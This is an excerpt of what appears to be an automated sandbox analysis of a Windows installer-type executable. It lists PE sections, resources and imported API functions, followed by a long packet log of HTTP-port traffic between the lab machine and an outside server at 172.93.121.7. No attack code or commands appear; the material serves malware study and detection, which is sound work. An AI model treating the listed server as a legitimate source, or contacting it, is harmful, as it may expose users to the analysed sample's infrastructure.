IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	ce9df19df15aa7bfbc0a8d0af0b841d0	False	0.6661261792452831	data	6.458398214928006	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	a118375c929d970903c1204233b7583d	False	0.4392755681818182	data	5.024109281264143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	82a10c59a8679bb952fc8316070b8a6c	False	0.521484375	data	4.15458210408643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x64ea8	0x65000	5294253f9c9db21a50d62c4c6bdf0863	False	0.13441029161509901	data	1.8715837561545812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x59328	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.1180356244637098
RT_ICON	0x9b350	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.14203537205725777
RT_ICON	0xabb78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.1536157241959218
RT_ICON	0xb5020	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.1853448275862069
RT_ICON	0xb9248	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.20881742738589212
RT_ICON	0xbb7f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.2626641651031895
RT_ICON	0xbc898	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.305327868852459
RT_ICON	0xbd220	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3608156028368794
RT_DIALOG	0xbd688	0x100	data	English	United States	0.5234375
RT_DIALOG	0xbd788	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0xbd8a8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xbd908	0x76	data	English	United States	0.7203389830508474
RT_VERSION	0xbd980	0x1e4	data	English	United States	0.512396694214876
RT_MANIFEST	0xbdb68	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 20:31:38.749021053 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:38.955976963 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:38.956182003 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:38.956564903 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.163436890 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.164582968 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.164630890 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.164743900 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.164908886 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.166707039 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.166754961 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.167052984 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.168845892 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.168894053 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.169130087 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.169262886 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.170985937 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.171036005 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.171225071 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.173146963 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.173197031 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.173373938 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.173373938 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.371903896 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.371952057 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.371974945 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.372076035 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.372112989 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.372134924 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.372359991 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.374114037 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.374226093 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.374335051 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.374397993 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.376269102 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.376388073 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.376512051 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.376589060 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.378413916 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.378488064 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.378678083 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.380562067 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.380675077 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.380836964 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.380911112 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.387412071 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.387439966 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.387623072 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.389549971 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.389662981 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.389847994 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.389868975 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.392904043 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.392991066 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.393076897 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.393237114 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.395081997 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.395195961 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.395265102 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.395381927 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.579178095 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.579219103 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.579245090 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.579385042 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.579452991 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.579483032 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.579608917 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.582335949 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.582367897 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.582653046 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.584382057 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.584424019 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.584734917 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.586503029 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.586546898 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.586831093 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.588727951 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.588759899 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.588922024 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.589071989 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.590886116 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.590918064 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.591296911 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.593007088 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.593049049 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.593272924 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.595138073 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.595180988 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.595397949 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.597299099 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.597338915 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.597538948 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.597568989 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.599458933 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.599499941 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.599776983 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.601656914 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.601700068 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.601917028 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.603816986 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.603863001 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.604116917 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.605983973 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.606015921 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.606197119 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.608068943 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.608100891 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.608222961 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.608329058 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.610392094 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.610424042 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.610682964 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.612380981 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.612413883 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.612695932 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.614530087 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.614561081 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.614751101 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.616946936 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.616978884 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.617218018 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.619093895 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.619143963 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.619353056 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.786384106 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.786454916 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.786508083 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.786581039 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.786611080 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.786623955 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.786726952 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.786835909 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.788507938 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.788599968 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.788732052 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.789041996 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.790719986 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.790741920 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.790990114 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.792934895 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.793042898 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.793332100 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.795039892 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.795152903 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.795232058 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.795319080 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.797172070 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.797329903 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.797514915 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.797514915 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.799350023 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.799451113 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.799652100 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.801462889 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.801574945 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.801645041 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.801862001 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.803620100 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.803760052 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.803813934 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.804069042 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.805809021 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.805824041 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.806081057 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.807957888 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.807972908 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.808309078 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.810054064 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.810162067 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.810318947 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.810333014 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.812242985 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.812350988 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.812475920 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.812546968 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.814373970 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.814513922 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.814600945 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.814718008 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.816550970 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.816657066 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.816747904 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.816992998 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.818694115 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.818794966 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.818880081 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.819009066 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.820893049 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.820908070 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.821206093 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.822984934 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.823098898 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.823194027 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.823286057 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.825232983 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.825248957 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.825529099 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.827368021 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.827383041 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.827604055 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.829549074 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.829564095 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.829839945 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.831674099 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.831784964 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.832036018 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.833806038 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.833916903 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.833997011 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.834106922 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.835968018 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.836039066 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.836126089 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.836241007 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.838052034 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.838093042 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.838243961 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.840250015 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.840265989 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.840487957 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.842375040 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.842488050 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.842554092 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.842780113 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.844491959 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.844532967 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.844686031 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.846752882 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.846862078 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.846978903 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.847063065 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.848845005 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.848956108 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.849066973 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.849144936 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.850960016 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.851094007 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.851119041 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.851342916 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.853133917 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.853306055 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.853477955 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.853477955 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.855349064 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.855364084 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.855499983 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.855642080 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.857484102 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.857498884 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.857749939 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.859668970 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.859683990 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.859905958 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.861846924 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.861958981 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.862019062 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.862143993 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.866331100 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.866345882 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.866628885 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.873281002 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.873296022 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.873543978 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.880366087 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.880381107 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.880630016 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.993592024 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.993613958 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.993626118 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.993788958 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.993797064 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.993885040 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.993957996 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.995759964 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.995867968 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.996052980 CEST	49794	80	192.168.11.20	172.93.121.7
